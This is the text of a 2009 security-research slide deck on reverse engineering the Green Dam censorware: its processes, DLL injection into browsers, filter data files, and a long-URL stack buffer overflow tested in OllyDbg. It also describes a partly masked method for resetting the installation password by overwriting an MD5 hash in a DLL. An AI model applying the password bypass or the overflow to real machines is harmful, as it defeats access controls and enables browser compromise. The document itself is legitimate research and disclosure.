1. Reversing and
Exploiting
Green Dam
[0xdf]
Valkyrie-X Security Research Lab
VXRL 2009 1
2. Special Thank You
• Mr. Byoungyoung Lee from PLUS and
who is the mentor/advisor of Valkyrie-X
VXRL 2009 2
3. Background
• Focus on research and studies on
software/system exploitation, vulnerability
and reverse engineering, penetration test
and crypto problems.
• Activity:We joined CTF and ranked at 68 in
DefCon 17 Prequalifying Round out 230
teams.
VXRL 2009 3
7. Reversing
• XNet2.exe
– It is the major Green Dam service
– It is for installation and register software key
to the system
– It is responsible for password check and reset
– Commander of XDaemon.exe and gn.exe
– Kick start a number of processes with the
following executables:
• Xdaemon, gn HTAnalyzer, MPSVCC, HNCENG,
HH, Looklog and LookPic
VXRL 2009 7
13. Installation Password
• After Green Dam converts the password
using the MD5 algorithm, it saves it in text
format within the kwpwf.dll file located in
the C:WINDOWSsystem32 directory.
When opened using Notepad, if the
content is then replaced with
"D0970714757783E6CF17????????????
????????" and saved, the password can
then be restored to the original
"1122??????". VXRL 2009 13
15. Green Dam – Data File
• Decrypted file content
– Contain keywords for filtering
• The data file naming convention and
filtering classification are exactly the same
as Cybersitter from Solid Oak.
VXRL 2009 15
22. Green Dam – Monitored Software
• Monitored software
– We could find it from injlib32.dll
– Injlib32.dll is injected to every critical process.
– Handle.dll is to create process/thread to
monitor any messages received from injected
DLL. (as it supports transmitstring).
Handler.dll Injlib32.dll
Notepad.exe
VXRL 2009 22
26. Green Dam – Exploitation
• Possible vulnerabilities in Green Dam
version 3.1.7
– As Green Dam is injected to the browser
process and it cannot handle long URL
– Stack Buffer Overflow is found.
• The exploit is published in Milw0rm.com. It
should be the same
VXRL 2009 26
28. What is Stack Buffer Overflow?
(from Wikipedia.org)
VXRL 2009 28
29. How can we exploit?
• We try out input 2048 ‘A’s and submit it as
an URL.
• We attach OllyDbg to the process of
Internet Explorer named as iexplore.exe
for debugging purpose in runtime.
VXRL 2009 29
31. Exploitation Summary
• Successfully overwritten with our input.
• Deploying shellcode will be our next
mission.
• No patch is provided
VXRL 2009 31
33. Conclusion
• We strongly suggest not installing this
software.
• It gives vulnerability, it is not just filtering
but monitor the use of software and the
content you typing into.
VXRL 2009 33
34. Thank you for your listening
• Anthony Lai (0xdf)
• 0xdarkfloyd@gmail.com
VXRL 2009 34
35. Reference
• Technical Analysis of Green Dam
– http://wikileaks.org/wiki/
A_technical_analysis_of_the_Chinese_'Green_Dam_Youth-
Escort'_censorship_software
• Analysis of Green Dam Censorware System
– http://www.cse.umich.edu/~jhalderm/pub/gd/
VXRL 2009 35
36. Tools
• MD5 Decryption
– http://www.md5decrypter.com/
• IDA Pro (Get a free version)
– http://www.hex-rays.com/idapro/
– http://www.amazon.com/exec/obidos/ASIN/1593271786/
datarescuesanv
VXRL 2009 36